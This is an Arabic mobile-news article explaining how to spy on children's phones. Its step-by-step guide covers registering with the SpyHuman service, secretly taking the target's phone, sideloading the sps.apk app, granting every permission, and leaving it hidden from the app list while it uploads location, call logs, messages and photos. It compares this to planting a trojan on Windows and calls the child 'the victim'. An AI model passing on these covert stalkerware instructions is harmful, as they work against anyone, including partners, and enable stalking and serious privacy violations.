أخبار الموبايلات

كيف تتجسس على هواتف الابناء ؟ بحسن نية !

كيف تتجسس على هواتف الابناء ؟ بحسن نية ! وتعني قاصدين حسن النية حيث لاننصح بهذه الطريقة الا ان كانت الغاية منها التقويم ومتابعة سلوك احد الابناء ومراقبة مكالماته وتحركاته, فهي الطريقة الاكثر جدوى بعيدا عن مهاترات البعض التي تذهب بك بعيدا دون نتيجة حقيقية من تلك الطريقة او ذك التطبيق.

لكي تتمكن من مراقبة اي احد فلايوجد مفر من ضرورة ان يكون هاتفه بين يديك لتعمل على زراعة وتثبيت العميل “التطبيق” الذي ستتواصل معه عن بعد ليفيدك بكل صغيرة وكبيرة تمت على الهاتف.
فلاتوجد طريقة اخرى بعيدا عن الهاتف المستهدف.

فكما هو الحال او ماكان عليه على انظمة التشغيل ويندوز بضرورة ان ترسل للضحية برميج صغير “Server” مع البريد الالكتروني او مدمج مع صورة يستقر في خدمات النظام متى قام الضحية بالضغط عليه ودون ان يدرك الورطة التي ستتسبب له لاحقا بالكثير من المشاكل.

هو نفس الحال وذات الطريقة, في ان تعمل على تثبيت تطبيق خاص على هاتف الابن “الضحية” الذي تريد مراقبة تحركاته وسلوكياته. وان تعمل على انشاء حسابك الخاص على موقع التطبيق من خلال الكمبيوتر, وتستخدم نفس تلك البيانات لتسجيل الدخول من خلال التطبيق على هاتف الابن.

سيعمل حينها التطبيق في خلفية النظام دون ان يتمكن احد من حذفه او الوصول اليه او التعرف على هويته. سيعمل تلقائيا على ارسال موقع الضحية الحالي و سجل المكالمات والرسائل والتنبيهات ومجلد الصور والكثير مما يمكنه الوصول اليه.

سيرسل كل ماسبق من بيانات الى نفس حسابك وحيث قمت بالتسجيل. كما سنعرض هنا.

توجه الى الرابط التالي الخاص بالتطبيق وخدماته
spyhuman

اختر التسجيل واعمل على ملأ البيانات ومن ثم Submit وتوجه الى بريدك الالكتروني لتفعيل الحساب كما هي الاعراف.

Advertisement

انتقل الان الى هاتف الضحية واعمل من خلاله “خلسة” على التوجه الى الرابط التالي لتحميل التطبيق 6 ميجابايت”الخاص بالمراقبة.
Download SpyHuman App (sps.apk)

ولسهولة الوصول الى موقع تحميل التطبيق تذكر هذا العنوان 22load.com

اعمل على تثبيت التطبيق وتفعيل جميع الخيارات التي تجدها امامك ومنحه صلاحيات الوصول والموافقة على تلك الرسائل.

عليك هنا اختيار وتحديد اسباب استخدامك للتطبيق- اختر مراقبة الاطفال
يمكك هنا تحديد ماتشاء كأن تراقب موقع الهاتف او سجل المكالمات..

سينتهي لك الامر الى نافذة تسجيل الدخول التي يعتليها خانة لوصف الهاتف باسم مميز كي تتمكن من التعرف اليه عند عرض سجلات المراقبة من خلال الكمبيوتر.
اعمل هنا على تسجيل الدخول بنفس البيانات التي قمت بالتسجيل بها من خلال الكمبيوتر.

عند اتمام عملية الدخول سيختفي التطبيق من امامك ومن امام اي مستخدم للهاتف ولن يتواجد في قائمة التطبيقات المثبتة كبقية التطبيقات.. يمكنك الان تركه جانبا وكأن شيئا لم يكن.

بالعودة الى الموقع الرئيس هنا وتسجيل الدخول ستجد ان عملية مراقبة كل صغيرة تتم على ذلك الهاتف هي اسهل ماتكون ضمن نافذة كثيرة الخيارات تتيح ان تنتقي ماشئت ادوات للمراقبة والمتابعة.

Advertisement

التعليقات مغلقة.

نحن نستخدم ملفات تعريف الارتباط "الكوكيز" لنمنحك أفضل تجربة مستخدم ممكنة قبولاقرأ المزيد